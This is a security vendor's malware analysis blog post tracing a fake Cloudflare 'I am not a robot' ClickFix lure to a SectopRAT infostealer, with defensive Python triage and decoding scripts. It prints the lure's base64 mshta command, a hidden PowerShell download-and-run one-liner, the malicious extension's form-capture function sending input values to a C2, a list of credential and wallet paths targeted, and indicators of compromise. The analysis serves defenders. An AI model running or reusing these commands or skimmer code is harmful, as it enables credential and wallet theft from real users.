Blog - Latest Enterprise IT News and Information | Inde Technology

I Am Not A Robot

Written by Chris Campbell | Mar 23, 2025

Since my last blog post on the subject, ClickFix-style social engineering techniques have been adopted by numerous threat groups, who have continued to refine their lures to make them increasingly convincing. This post looks at a recent variant that appears to website visitors as a Cloudflare Turnstile challenge, with an interesting twist.

The Malware

SectopRAT (aka ArechClient, 1xxbot) is a Remote Access Trojan built on the .NET framework that has been active since early 2019. This evasive malware employs an extensive toolkit for data exfiltration, including browser credential theft, cryptocurrency wallet harvesting, and system profiling capabilities. What distinguishes SectopRAT is its ability to establish concealed secondary desktops, allowing threat actors to remotely manipulate browser sessions without the victim's knowledge.

The malware implements robust anti-analysis features, including anti-VM and anti-emulator functionalities, while securing command and control communications with AES-256 encryption.

Just as in the scenario that will be described, SectopRAT is typically distributed through malvertising campaigns (including Google and Bing ads) and drive-by downloads of illegitimate software.

The Lure

Users are first drawn to the site through either Google search results or the site's 15k-subscriber YouTube channel:

Shortly after loading, the ClickFix script is requested from an off-site URL:

<script type="text/javascript" src="hXXps://forfsakencoilddxga[.]com/cloud?ts=1742497282" id="ic-tracker-js" defer="defer" data-wp-strategy="defer"></script>

This 301s to an R2 bucket at hXXps://caprofklfkzttripwith[.]com/main2.js, which serves heavily obfuscated JavaScript. Obfuscator.io Deobfuscator took care of the initial deobfuscation, and Claude tidied up the rest. Stepping through the script execution:

A DOM overlay is constructed that accurately mimics Cloudflare’s styling:

document.querySelector("head").appendChild(styleElement);

A pseudo-random 16-character “Ray ID” is generated:

let fakeRayId = "";
for (let i = 0; i < 16; i++) {
  fakeRayId += "0123456789abcdef"[Math.floor(Math.random() * "0123456789abcdef".length)];
}

Timed animations are used to simulate the verification process spinner:

setTimeout(function() {
  document.getElementById("loading").style.display = "none";
  setTimeout(function() {
    document.getElementById("box").style.display = "flex";
    // other UI functions
  }, 300);
}, 2000);

Local storage is used to track interaction count:

if (!localStorage._0xc4a713) {
  localStorage._0xc4a713 = 0;
}
if (localStorage._0xc4a713 < 2) {
  // display message
}

After 2 attempts, the lure message is presented, suggesting unusual traffic has been detected:

A base64 encoded command is decoded, to be copied to the clipboard in place of the expected “verification code”:

let decodeCommand = function(encodedString) {
  encodedString = atob(encodedString);
  let bytes = new Uint8Array(encodedString.length);
  for (let i = 0; i < encodedString.length; i++) {
    bytes[i] = encodedString.charCodeAt(i);
  }
  return new TextDecoder("utf-8").decode(bytes);
};
let maliciousCommand = decodeCommand("bXNodGEgaHR0cHM6Ly9zZXJ2aWNlaW5kdXN0cnZlcmlmLmNvbSAjIEkgYW0gbm90IGEgcm9ib3Q6IENsb3VkZmxhcmUgVmVyaWZpY2F0aW9uIElEOiAxMVpBLVBPWg==");

The script also implements crude anti-debugging techniques that trigger an infinite breakpoint loop when developer tools are enabled:

function antiDebugFunction(param) {
  function debugDetector(counter) {
    if (typeof counter === "string") {
      return function(x) {}.constructor("while (true) {}").apply("counter");
    } else {
      if (('' + counter / counter).length !== 1 || counter % 20 === 0) {
        (function() { return true; }).constructor("debugger").call("action");
      }
    }
  }
  // run code
}
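The building blocks walked through above (a base64 literal that decodes to a command line, a clipboard write, a fake Ray ID generator) are also what a defender can key on when triaging a suspicious page. The following is an added example written for this post, not the lure's code or the author's tooling: a small static check that decodes long base64 literals found in a script and flags any that decode to a Windows command line. The script text it scans is constructed to resemble the snippets above, and the decoded command inside it is a placeholder rather than the live one.

```python
"""Static triage for ClickFix-style pages: decode long base64 literals in a script and
flag any that decode to a Windows command line, plus the supporting tells."""
import base64
import re

# Any quoted literal that looks like base64 and is long enough to carry a command.
B64_LITERAL_RE = re.compile(r'["\']([A-Za-z0-9+/]{24,}={0,2})["\']')
# Commands a "verification" page has no legitimate reason to hand a visitor.
COMMAND_RE = re.compile(
    r"^\s*(?:mshta|powershell|pwsh|cmd|curl|certutil|rundll32|regsvr32|bitsadmin|wscript|cscript)\b",
    re.I,
)
CLIPBOARD_RE = re.compile(r"navigator\.clipboard\.writeText|execCommand\(\s*['\"]copy['\"]")


def decode_literals(js):
    """Return (literal, text) for each base64 literal that decodes to printable UTF-8."""
    found = []
    for literal in B64_LITERAL_RE.findall(js):
        try:
            text = base64.b64decode(literal, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):  # not base64, bad padding, or binary
            continue
        if text.isprintable():
            found.append((literal, text))
    return found


def hidden_commands(js):
    """Decoded literals that start with a LOLBin or shell, split at the first '#' so the
    operative command and the decoy comment the victim sees are reported separately."""
    results = []
    for _, text in decode_literals(js):
        if COMMAND_RE.match(text):
            command, _, decoy = text.partition("#")
            results.append({"command": command.strip(), "decoy": decoy.strip()})
    return results


def triage(js):
    """Combine the tells: clipboard write, fake Ray ID generator, hidden command line."""
    return {
        "clipboard_write": bool(CLIPBOARD_RE.search(js)),
        "fake_ray_id": "0123456789abcdef" in js and "Math.random" in js,
        "hidden_commands": hidden_commands(js),
    }


# Constructed sample resembling the lure; the command is a placeholder, not the real one.
PLACEHOLDER_CMD = "mshta https://lure.example.invalid # I am not a robot: Verification ID: 0000-0000"
SAMPLE_JS = """
let fakeRayId = "";
for (let i = 0; i < 16; i++) {
  fakeRayId += "0123456789abcdef"[Math.floor(Math.random() * 16)];
}
let maliciousCommand = decodeCommand("%s");
navigator.clipboard.writeText(maliciousCommand);
""" % base64.b64encode(PLACEHOLDER_CMD.encode()).decode()

# Constructed benign script: a long base64 literal that is just text, no command.
BENIGN_JS = 'var banner = "%s";' % base64.b64encode(b"plain text, nothing to run here").decode()

if __name__ == "__main__":
    print(triage(SAMPLE_JS))
    print(triage(BENIGN_JS))
```

The split at the first `#` mirrors the trick described in the next section: what the victim sees in the Run box is the decoy tail, so reporting the two halves separately makes the finding readable at a glance.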

Execution

If followed, the instructions lead the user to paste the text into the Run box, which, even on a large screen, hides the functional command behind a code comment:

Preceding this comment is an MSHTA command that invokes a script from hXXps://serviceindustrverif[.]com:

This runs PowerShell to make an HTTP request, download an MSI package to C:\Users\Public, and then execute it:

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -W Hidden iwr -Uri hXXps://ownlifeforyouwithme[.]com/plo -O $env:PUBLIC\\abc.msi;start $env:PUBLIC\\abc.msi

This URL 301’s to hXXps://kdfmmikfkafjikmfikfjhm[.]com/05.zrt, another public R2 bucket.

A standard installation notice very briefly appears:

Similar to behaviour seen in Qakbot samples of early 2024, the MSI uses SrTasks to create a system restore point as a means of persistence across factory resets:

hello.exe (94MB, with an invalid signature for McAfee) and icuin40.dll are dropped in C:\Users\admin\AppData\Local\Beam\:

hello.exe goes through several rounds of unpacking before creating LightingService.exe under the user’s Roaming profile:

Persistence across sessions is set up by means of a startup entry:

Like hello.exe, LightingService.exe is also oversized and has an invalid signature:

This serves as the loader for the SectopRAT payload.

Impact

SectopRAT is loaded by LightingService.exe into MSBuild using reflection. Being a .NET application, the modules for the process can be dumped using a tool like MegaDumper:

Despite attempts to further clean up the code of the unpacked dfgfghfghfghfghfgh.exe, the control flow remains quite mangled. However, with adequate determination, both debugging it and deriving the capabilities of the RAT through static code review remain feasible. The code clearly reveals the main targeted data categories, including:

  • System information.
  • Cookies, saved passwords, history, autofills.
  • Crypto wallets.
  • VPN configs.

The binary also has an embedded resource that contains its encoded configuration. Stepping through a debugging session, the following function is found to perform the decoding prior to the strings being used by other functions (e.g., HTTP headers, C2 endpoints, target application paths):

This function deobfuscates chunks of the resource using parameters that roll throughout the application lifecycle. It:

  • Applies integer transformations to the input parameters: A_0 += 593 and A_1 -= 331.
  • Performs a bitwise XOR between the modified values: num = A_0 ^ A_1.
  • Applies an integer division with truncation: num = num * 17 / 27.
  • Uses the calculated value to position a stream pointer at offset 7 + num within the embedded resource.
  • Reads two 4-byte blocks to extract metadata, which is then decoded. The hardcoded XOR values (2100157544 and 485648943) and offset constants (100 and 5) serve as a two-layer obfuscation mechanism for this string metadata.
  • Repositions the stream to the decoded position: Seek((long)num2, SeekOrigin.Begin).
  • Allocates a buffer of exactly the decoded length: array = new byte[num3].
  • Applies a final single-byte XOR decryption using the third parameter (A_2) as the key.
  • Joins the array bytes into a single UTF-8 encoded string.

Taking the C# implementation of this function as a reference, I developed a script to brute force the encoded configuration values directly from the resource file by:

  • Scanning the entire resource file byte-by-byte, starting at the header offset.
  • At each potential metadata location, attempting to decipher the positional metadata by:
    • Reading 4 bytes and interpreting them as a 32-bit integer.
    • Applying the exact XOR operation and offset used in the C# code.
    • Reading the next 4 bytes for the length and applying its specific transformation.
  • For each valid metadata pair found:
    • Reading the bytes at the calculated position.
    • Trying all 256 possible XOR keys (0-255) to decrypt the string.
    • Validating each potential decryption through multiple filters.
  • To reduce the likelihood of false-positive results, applying multiple filter techniques:
    • Checking character validity to filter non-ASCII data.
    • Calculating Shannon entropy to distinguish meaningful text from random data.
    • Using regex to identify common string patterns (URLs, IP addresses, paths).
    • Identifying legitimate English language content using NLTK.
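Since both the decoder's steps and the brute-force approach are spelled out above, here is an added Python re-implementation of both, written for this post and not taken from the author's script or from the malware. The resource blob it works on is constructed. The post gives the two XOR values and the two offset constants but not which applies to the position word and which to the length word, nor whether the offset is removed before or after the XOR; the pairing and ordering below are therefore assumptions, and the NLTK English-word filter is omitted so the example runs offline.

```python
"""Illustrative re-implementation of the SectopRAT string decoder described above, plus
the brute-force scanner. Added example; the resource blob is constructed, and the
constant pairing / XOR-then-offset ordering are assumptions (see comments)."""
import math
import re
import struct

HEADER_OFFSET = 7                           # "offset 7 + num" in the description
XOR_POS, XOR_LEN = 2100157544, 485648943    # the two hardcoded XOR values
OFF_POS, OFF_LEN = 100, 5                   # the two offset constants
# ASSUMPTION: first constant of each pair protects the position word, second the length
# word, and the offset is removed after the XOR. The post gives the constants only.


def c_div(a, b):
    """C# integer division truncates toward zero; Python's // floors, so emulate it."""
    q = abs(a) // abs(b)
    return q if (a < 0) == (b < 0) else -q


def slot_for(a0, a1):
    """Metadata slot selected by the rolling parameters, exactly as described."""
    a0 += 593
    a1 -= 331
    return c_div((a0 ^ a1) * 17, 27)


def decode_metadata(pos_word, len_word):
    """Strip the two-layer (XOR + offset) obfuscation from one metadata pair."""
    return (pos_word ^ XOR_POS) - OFF_POS, (len_word ^ XOR_LEN) - OFF_LEN


def decode_string(resource, a0, a1, a2):
    """Mirror of the decoder: seek to the slot, read two int32s, seek again, XOR with a2."""
    off = HEADER_OFFSET + slot_for(a0, a1)
    pos_word, len_word = struct.unpack_from("<ii", resource, off)
    num2, num3 = decode_metadata(pos_word, len_word)
    return bytes(b ^ a2 for b in resource[num2:num2 + num3]).decode("utf-8")


def build_resource(entries):
    """Constructed test blob: (a0, a1, key, text) entries encoded with the assumed scheme."""
    table = bytearray(8 * len(entries))     # one 8-byte metadata pair per entry
    data = bytearray()
    for a0, a1, key, text in entries:
        raw = text.encode("utf-8")
        pos = HEADER_OFFSET + len(table) + len(data)
        data += bytes(b ^ key for b in raw)
        struct.pack_into("<ii", table, slot_for(a0, a1),
                         (pos + OFF_POS) ^ XOR_POS, (len(raw) + OFF_LEN) ^ XOR_LEN)
    return b"\x00" * HEADER_OFFSET + bytes(table) + bytes(data)


# Filters standing in for the post's validation stage (NLTK English check omitted).
PATTERNS = [
    re.compile(r"https?://[\w.\-]+(?::\d+)?"),              # URL
    re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}(?::\d+)?\b"),     # IP[:port]
    re.compile(r"(?:%\w+%|[A-Za-z]:)\\[\w .\-\\]+"),         # Windows path
]


def shannon_entropy(data):
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in (data.count(b) for b in set(data)))


def looks_like_config(text):
    """ASCII-printable, entropy plausible for natural text, and a known string shape."""
    if not (text.isascii() and text.isprintable()):
        return False
    if not 1.5 <= shannon_entropy(text.encode()) <= 5.5:
        return False
    return any(p.search(text) for p in PATTERNS)


def brute_force(resource, max_len=512):
    """Treat every offset from the header as a candidate metadata pair, then try all keys."""
    hits = []
    for off in range(HEADER_OFFSET, len(resource) - 7):
        pos_word, len_word = struct.unpack_from("<ii", resource, off)
        pos, length = decode_metadata(pos_word, len_word)
        if not (HEADER_OFFSET <= pos and 1 <= length <= max_len and pos + length <= len(resource)):
            continue                        # sanity filter rejects almost every offset
        blob = resource[pos:pos + length]
        for key in range(256):
            text = bytes(b ^ key for b in blob).decode("latin-1")
            if looks_like_config(text):
                hits.append((off, pos, key, text))
    return hits


SAMPLE = build_resource([                   # constructed, not real configuration values
    (-592, 331, 0x5A, "http://c2.example.invalid:9000"),
    (-580, 331, 0x17, "%USERPROFILE%\\AppData\\Local\\Example Wallet\\User Data"),
])

if __name__ == "__main__":
    print(decode_string(SAMPLE, -592, 331, 0x5A))
    for hit in brute_force(SAMPLE):
        print(hit)
```

The sanity check on the decoded position and length does most of the work: a random 8-byte window almost never yields a length in 1..512 and a position inside the file, so the 256-key loop and the regex/entropy filters only run on a handful of candidates.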

An alternative approach was proposed by Jason Reaves, which instead uses YARA to initially identify known XOR-encoded patterns and their encryption keys, then narrows the search to a small window around these matches before selectively applying regex pattern matching with either the discovered key or brute-forcing keys only within this confined area.

As well as having a hardcoded C2, the resource also embeds a Pastebin URL that lists one or more C2 servers as backups:

Central to its operation is the ScanResult object, which is populated with the results of the collector functions in preparation for exfiltration to the C2 server:

The possible target paths and browser extension IDs are:

Browsers and Gaming Clients

%USERPROFILE%\AppData\Local\Battle.net

%USERPROFILE%\AppData\Local\Chromium\User Data

%USERPROFILE%\AppData\Local\Google\Chrome\User Data

%USERPROFILE%\AppData\Local\Google(x86)\Chrome\User Data

%USERPROFILE%\AppData\Roaming\Opera Software\

%USERPROFILE%\AppData\Local\MapleStudio\ChromePlus\User Data

%USERPROFILE%\AppData\Local\Iridium\User Data

%USERPROFILE%\AppData\Local\7Star\7Star\User Data

%USERPROFILE%\AppData\Local\CentBrowser\User Data

%USERPROFILE%\AppData\Local\Chedot\User Data

%USERPROFILE%\AppData\Local\Vivaldi\User Data

%USERPROFILE%\AppData\Local\Kometa\User Data

%USERPROFILE%\AppData\Local\Elements Browser\User Data

%USERPROFILE%\AppData\Local\Epic Privacy Browser\User Data

%USERPROFILE%\AppData\Local\uCozMedia\Uran\User Data

%USERPROFILE%\AppData\Local\Fenrir Inc\Sleipnir5\setting\modules\ChromiumViewer

%USERPROFILE%\AppData\Local\CatalinaGroup\Citrio\User Data

%USERPROFILE%\AppData\Local\Coowon\Coowon\User Data

%USERPROFILE%\AppData\Local\liebao\User Data

%USERPROFILE%\AppData\Local\QIP Surf\User Data

%USERPROFILE%\AppData\Local\Orbitum\User Data

%USERPROFILE%\AppData\Local\Comodo\Dragon\User Data

%USERPROFILE%\AppData\Local\Amigo\User\User Data

%USERPROFILE%\AppData\Local\Torch\User Data

%USERPROFILE%\AppData\Local\Yandex\YandexBrowser\User Data

%USERPROFILE%\AppData\Local\Comodo\User Data

%USERPROFILE%\AppData\Local\360Browser\Browser\User Data

%USERPROFILE%\AppData\Local\Maxthon3\User Data

%USERPROFILE%\AppData\Local\K-Melon\User Data

%USERPROFILE%\AppData\Local\Sputnik\Sputnik\User Data

%USERPROFILE%\AppData\Local\Nichrome\User Data

%USERPROFILE%\AppData\Local\CocCoc\Browser\User Data

%USERPROFILE%\AppData\Local\Uran\User Data

%USERPROFILE%\AppData\Local\Chromodo\User Data

%USERPROFILE%\AppData\Local\Mail.Ru\Atom\User Data

%USERPROFILE%\AppData\Local\BraveSoftware\Brave-Browser\User Data

%USERPROFILE%\AppData\Local\Microsoft\Edge\User Data

%USERPROFILE%\AppData\Local\NVIDIA Corporation\NVIDIA GeForce Experience

%USERPROFILE%\AppData\Local\Steam

%USERPROFILE%\AppData\Local\CryptoTab Browser\User Data

%USERPROFILE%\AppData\Roaming\Mozilla\Firefox

%USERPROFILE%\AppData\Roaming\Waterfox

%USERPROFILE%\AppData\Roaming\K-Meleon

%USERPROFILE%\AppData\Roaming\Thunderbird

%USERPROFILE%\AppData\Roaming\Comodo\IceDragon

%USERPROFILE%\AppData\Roaming\8pecxstudios\Cyberfox

%USERPROFILE%\AppData\Roaming\NETGATE Technologies\BlackHaw

%USERPROFILE%\AppData\Roaming\Moonchild Productions\Pale Moon

%USERPROFILE%\AppData\Roaming\discord\Local Storage\leveldb\

Crypto Wallets

%appdata%\atomic

%appdata%\exodus

%appdata%\electrum

%appdata%\Daedalus Mainnet\

Browser Extensions

nkbihfbeogaeaoehlefnkodbefgpgknn: Metamask

fhbohimaelbohpjbbldcngcnapndodjp: BNB Chain Wallet

ibnejdfjmmkpcnlpebklmnkoeoihofec: TronLink

ckpaelocniggkheibcacecnmmlmeodfa: CryptoBit

VPN Clients

%USERPROFILE%\AppData\Local\NordVPN

%USERPROFILE%\AppData\Local\ProtonVPN\

%USERPROFILE%\AppData\Roaming\OpenVPN Connect\profiles\

SectopRAT may also deploy a browser plugin for Chrome; however, this does not appear to happen consistently in every run:

The plugin has a Google Docs icon and is given the name “Google Docs”. While the bundled jQuery script is genuine, the others are not. background.js acts as a fetch proxy that lets content.js bypass the same-origin policy regardless of the web server's CORS configuration:

  • Registers a message listener for content script communications.
  • Executes HTTP GET requests to arbitrary URLs on behalf of the content script.
  • Returns responses asynchronously through Promise resolution.

Data interception by content.js is achieved by:

  • Executing immediately upon page load via a self-invoking function.
  • Reporting initial URL to the command server: getNoRet(server+'churl?pcid='+iddd+"&url="+loc)
  • Establishing event listeners on all input elements across five form element types.
  • Rebinding event listeners when detecting navigation: currLoc != location.href

The core data capture function transmits every form interaction to the C2 with contextual metadata, including field name, domain, and client identifier:

function spyjs_getInput(inputInfo, clid) {
  var name = inputInfo.name;
  var value = inputInfo.value;
  if (name === "") { name = "undefined_input"; }
  if (value != "") {
    getNoRet(server + 'fsave?name=' + name + "&value=" + value + "&sites=" + base + "&clid=" + clid);
  }
}
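The two behaviours just described, a background worker that fetches whatever URL a content script asks for and a content script that hooks form inputs and ships their values off-page, are both visible in a static read of an unpacked extension. The following is an added example, not the post's or the extension's code: an audit pass over an extension given as a dictionary of filenames to contents. The manifest and scripts it checks are constructed stand-ins modelled on the description above, and the regex heuristics are the example's own.

```python
"""Static audit of an unpacked Chrome extension for the proxy-fetch and form-capture
patterns described above. Inputs are constructed stand-in files, not the real plugin."""
import json
import re

# background: a runtime message listener plus a fetch() whose argument is a variable,
# not a literal URL (heuristic: fetch(literal) is not flagged, fetch(msg.url) is).
LISTENER_RE = re.compile(r"onMessage\.addListener\s*\(")
DYNAMIC_FETCH_RE = re.compile(r"\bfetch\(\s*[A-Za-z_$][\w$]*(?:\.[\w$]+|\[[^\]]+\])*")
# content: listeners on form events, and an element's .value flowing into an outbound call.
INPUT_EVENT_RE = re.compile(
    r"addEventListener\(\s*['\"](?:input|change|keyup|keydown|keypress|blur|submit)['\"]")
VALUE_OUT_RE = re.compile(r"(?:sendMessage|fetch|XMLHttpRequest|sendBeacon)\([\s\S]{0,300}?\.value\b")


def background_scripts(manifest):
    """MV3 service worker or MV2 background scripts, whichever the manifest declares."""
    bg = manifest.get("background", {})
    return [bg["service_worker"]] if "service_worker" in bg else bg.get("scripts", [])


def audit_extension(files):
    """Return a list of findings for an extension given as {filename: contents}."""
    manifest = json.loads(files["manifest.json"])
    findings = []
    reach = list(manifest.get("host_permissions", []))
    for cs in manifest.get("content_scripts", []):
        reach += cs.get("matches", [])
    if "<all_urls>" in reach:
        findings.append("manifest: extension runs on or may reach <all_urls>")
    for name in background_scripts(manifest):
        src = files.get(name, "")
        if LISTENER_RE.search(src) and DYNAMIC_FETCH_RE.search(src):
            findings.append(f"{name}: message listener fetches a sender-supplied URL (open proxy)")
    for cs in manifest.get("content_scripts", []):
        for name in cs.get("js", []):
            src = files.get(name, "")
            if INPUT_EVENT_RE.search(src) and VALUE_OUT_RE.search(src):
                findings.append(f"{name}: form-event listener sends input values off-page")
    return findings


# Constructed stand-in for the suspicious extension (not the real "Google Docs" plugin).
SUSPICIOUS = {
    "manifest.json": json.dumps({
        "name": "Google Docs", "manifest_version": 3, "version": "1.0",
        "host_permissions": ["<all_urls>"],
        "background": {"service_worker": "background.js"},
        "content_scripts": [{"matches": ["<all_urls>"], "js": ["jquery.js", "content.js"]}],
    }),
    "background.js": (
        "chrome.runtime.onMessage.addListener((msg, sender, sendResponse) => {\n"
        "  fetch(msg.url).then(r => r.text()).then(sendResponse);\n"
        "  return true;\n});"
    ),
    "content.js": (
        "(function () {\n"
        "  var server = 'https://collector.example.invalid/';\n"
        "  document.querySelectorAll('input, select, textarea').forEach(function (el) {\n"
        "    el.addEventListener('change', function () {\n"
        "      chrome.runtime.sendMessage({url: server + 'fsave?name=' + el.name + '&value=' + el.value});\n"
        "    });\n  });\n})();"
    ),
    "jquery.js": "/* vendored library; contents irrelevant to the audit */",
}

# Constructed benign extension: scoped host match, no listener, no outbound values.
BENIGN = {
    "manifest.json": json.dumps({
        "name": "Docs Helper", "manifest_version": 3, "version": "1.0",
        "content_scripts": [{"matches": ["https://docs.example.invalid/*"], "js": ["content.js"]}],
    }),
    "content.js": "document.title = 'Docs Helper: ' + document.title;",
}

if __name__ == "__main__":
    for finding in audit_extension(SUSPICIOUS):
        print(finding)
    print(audit_extension(BENIGN))
```

Run against a real unpacked extension directory, the same function only needs a loop that reads each file into the dictionary; the point of the three checks together is that a broad host match on its own is common in legitimate extensions, while the combination with a sender-controlled fetch and form-value exfiltration is not.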

Variants

Less than a day later, the site started serving the same SectopRAT payload via an AutoIt chain. While the PowerShell download URL remained the same, it served up a different executable with an invalid signature (for Dunes MultiMedia). Additionally, the loader (jsc.exe) contains an invalid Microsoft signature:

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -W Hidden iwr -Uri hXXps://ownlifeforyouwithme[.]com/plo -O $env:PUBLIC\\abc.exe;start $env:PUBLIC\\abc.exe

Artifacts

Description | Type | Value
ClickFix script redirect | Domain | forfsakencoilddxga[.]com
ClickFix script host | Domain | caprofklfkzttripwith[.]com
MSHTA host | Domain | serviceindustrverif[.]com
MSI redirect | Domain | ownlifeforyouwithme[.]com
MSI host | Domain | kdfmmikfkafjikmfikfjhm[.]com
LightingService.exe | SHA256 | 43f47c078b795ef54e95bf3982c18a49e3633f7490a8e49630230103181ff535
dfgfghfghfghfghfgh.exe | SHA256 | 79f924889d25926fe6cf9c2f07c4288cb490f855223cb30354343338db9c2034
SectopRAT C2 Backup | URL | hXXps://pastebin[.]com/raw/UPxYyFp8
SectopRAT C2 | IP:Port | 92.255.85[.]23:9000
SectopRAT C2 | IP:Port | 92.255.85[.]23:15847
content.js | SHA256 | bc2f9687e3628a422d53b045271bf23c2cbb41359770596901899875fd30fb38
background.js | SHA256 | aad1c9be17f64d7700feb2d38df7dc7446a48bf001ae42095b59b11fd24dfcde

This sample was also provided to montysecurity who very promptly added detection for SectopRAT C2 servers to their excellent C2 Tracker project.

Fellow researcher Saksham Anand has also performed some neat analysis of the infrastructure associated with this campaign.

Response

  • Retire legacy antivirus solutions in favour of modern XDR options such as Defender for Endpoint, CrowdStrike or SentinelOne. Our testing produced only behavioural detections, for which traditional antivirus provides little or no coverage.
  • Ensure your XDR platform is configured according to vendor recommended best practices. This will include:
    • Enabling anti-tamper functionality.
    • Avoiding exclusions wherever possible and, where a conflict between software and the security platform is identified, defining exclusions as specifically as possible. Never define broad exclusions, including those that apply to entire drives or profiles, file types, or system applications that could be abused as LOLBins.
  • Pay specific attention to Defender for Endpoint alerts pertaining to an “emerging threat” or specifically named threat actor:

  • Do not underestimate the potential implications of low and medium severity detections. It is vital to consider their context:

  • Avoid in-browser secret storage, including for passwords, autofills and credit card data. Opt for a secure password manager, like 1Password or Proton Pass.
  • Ensure that browsers and extensions are set to automatically update.
  • Use an adblocker within your browser. This includes Adblock Plus for Edge, and Brave’s built-in capability.
  • Store substantial cryptocurrency holdings in a hardware wallet (e.g., Ledger, Trezor).

Understand Your Coverage

If you'd like to better understand your coverage of remote access trojans and infostealer malware, please reach out to us to book a call.